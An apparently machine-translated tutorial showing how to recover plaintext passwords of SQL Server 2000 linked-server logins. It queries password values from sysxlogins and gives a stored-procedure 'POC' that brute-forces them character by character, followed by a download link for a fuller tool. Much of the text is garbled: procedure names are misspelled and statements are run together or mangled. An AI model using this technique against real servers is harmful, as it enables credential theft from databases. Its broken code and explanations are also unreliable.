How to crack the password of the 2000 linked server in plain text

How to crack the password of the 2000 linked server in plain text

MSSQL has a LINKSERVER function, which is used to connect to a server. Each character is encrypted into 4 bits. You do not need to worry about the encryption algorithm.

 

View my version number

Then run the following code to check my connection.

Code statement: Exec sp_helpserver

Now we can see that there are 6 connections in the database. Now I want to create a new linkserver connection named dhlinkserver.

 

Step 1: first create a linkserver

sp_addlinkedserver 'dhlinkserver','','SQLOLEDB','127.0.0.1','','','master'

The execution is successful.

 

Check the connection again. Seven connections are displayed. Now, create a table to store the HASH value.

 

After creating a linkserver connection, add a new account and password to the connection.

Code area:

EXEC sp_add1_srvlogin 'dhlinkserver', -- the accessed server alias (if the alias JOY is used in the sp_addmediaserver, JOY is also used here) 'false', NULL, 'test123 ', -- account 'test123' -- Password

After the execution is successful: the account is test123 and the password is test123.

 

Query the passwords stored in the current database:

Statement execution

select name,master.dbo.fn_VarBinToHexStr(password)pass from master.dbo.sysxlogins

 

I am creating a linkserver connection named www.

 

The linkserver connection without www is displayed.

Another method is to create a linkserver. Next I will use the second method to create a link. The first method of connection can be described in the first step of this article and I will not explain it.

The second method is to directly create a connection.

Exec sp_addmediaserver @ server = 'server' name created by server

 

Now we can query whether the connection is successfully created.

Query statement: Exec sp_helpserver

As I mentioned above, the www connection creates a user name for the www connection: test12 and the password is test12. Let's see if the hash is the same.

 

OK is created successfully. query the password

 

We can see that each character is encrypted with four characters. The last linkserver connection username added: test123 password: test123

In this comparison, a password character is missing, and a four-digit encryption algorithm is missing.

Username: test123 pass: 0xc7fb432df59950d1b05c1edb5a6f Username: test12 pass: 0xc7fb432df59950d1b05c1edb

 

Step 2: Create a table to store the calculated HASH

Execute the statement:

create table mssql (list int not null identity (1,1), pass nvarchar(500),code varbinary(256))

 

sp_dropserver 'dhlinkserver', 'droplogins'drop table mssqlDROP PROCEDURE pwd

 

The table is successfully created, and the storage cracking process is created.

Step 3: Create a stored procedure for cracking

POC:

create   procedure   pwd@pwd sysname = NULLAS    declare @ss varchar(256),@str varchar (256),@getpass varbinary(256)     truncate table mssql    create table #t (inetpub nvarchar(500))    select @ss=@pwd+'abcdefghijklmnopqrstuvwxyz`0123456789-=[]\;,./~!@#$%^&*()_+{}|:<>?'    declare @index int    select @index=1    while (@index <=len(@ss))    begin        insert #t(inetpub) select SUBSTRING (@ss,@index,1)        select @index = @index +1        select @str=@pwd+inetpub from #t        exec master.dbo.sp_addlinkedsrvlogin 'dhlinkserver','false',Null,'xxxx',@str        select @getpass = password from master.dbo.sysxlogins where name ='xxxx'        insert into mssql(pass,code) values (@str,@getpass)    endselect list,pass,master.dbo.fn_VarBinToHexStr(code)code from mssqldrop table #t

 

Step 4: query the password stored in the current database

Elect name, master. dbo. fn_VarBinToHexStr (password) pass from master. dbo. sysxlogins

Related Materials

Step 1 Details:

sp_addlinkedserver 'dhlinkserver','','SQLOLEDB','127.0.0.1','','','master'sp_addlinkedserver

Create a linked server so that it can access distributed heterogeneous queries targeting the ole db data source. After using sp_addmediaserver to create a linked server, the server can perform distributed queries. If the linked Server is defined as Microsoft SQL Server, a remote stored procedure can be executed.

'Dhlinkserver' is the name of the connection created. This connection name is 'sqlodb'. Use SQLOLEDB to remotely access 127.0.0.1 and the IP address 'master' to access the connection'

This connection has his information http://www.jb51.net/article/14194.htm

Second details:

Create table mssql (list int not null identity (500), pass nvarchar (256), code varbinary () sp_dropserver 'dhlinkserver ', 'droplogins' drop table mssqlddrop PROCEDURE pwd this is the create table creation table statement sp_dropserver deletes the Server from the list of known remote and linked servers on the local Microsoft SQL Server. Syntax: sp_dropserver [@ server =] 'server '[, [@ droplogins =] {'droplogins' | NULL}] 'dhlinkserver' is the name of the linkserver connection established in the previous step.

Complete testing POC:

Link: http://pan.baidu.com/s/1mgh7QL6 password: 1n29